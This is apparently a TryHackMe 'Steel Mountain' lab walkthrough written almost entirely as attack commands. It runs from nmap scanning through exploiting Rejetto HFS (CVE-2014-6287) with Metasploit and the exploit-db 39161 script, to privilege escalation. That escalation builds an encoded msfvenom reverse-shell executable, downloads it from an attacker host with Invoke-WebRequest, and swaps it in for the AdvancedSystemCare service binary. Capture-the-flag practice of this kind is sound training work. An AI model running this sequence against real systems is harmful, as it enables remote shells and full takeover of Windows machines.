TryHackMe: Steel Mountain

  1. Deploy the machine. Who is the employee of the month?
nmap -Pn <ip>
nmap -sV -O <ip>
http://<ip>
nmap --script vuln <ip>
port 80 -> http-vuln-cve2015-1635
port 8080 -> http-vuln-cve2011-3192
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
http://<ip>:8080
https://www.exploit-db.com/
msfconsole
search 2014-6287
use 0
show options
set RHOSTS <target ip>
set RPORT 8080
run
getsystem
migrate
cd /Users
ls
cd bill
ls
cd Desktop
ls
cat user.txt
  1. Upload Script
upload <path>
ls 
load powershell
powershell_shell
. .\Powerup.ps1
Invoke-Allchecks
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
use multi/handler
set LHOST <attacker ip>
set LPORT <attacker port>
sessions 3
upload /root/Desktop/ASCService.exe
shell
sc stop AdvancedSystemCareService9
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9
ps
migrate 648
getsystem
cd /Users/Administrator/Desktop
ls
cat root.txt
  1. Save script from https://www.exploit-db.com/exploits/39161
python -m SimpleHTTPServer 80
nc -lvp 4444
python rejetto.py <ip> 8080
mv ncat.exe nc.exe
python rejetto.py <ip> 8080
systeminfo
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://<attacker ip>/winPEAS.exe"
dir
winPEAS.exe
AdvancedSystemCareService9
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
powershell -c "Get-Service"
cd \Program Files (x86)\IObit\Advanced SystemCare
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1234 -f exe -o ASCService.exe
nc -lvp 1234
sc stop AdvancedSystemCareService9
rename ASCService.exe ASCService_bak.exe
powershell -c "Invoke-WebRequest -OutFile ASCService.exe http://10.8.3.50/ASCService.exe"
sc start AdvancedSystemCareService9
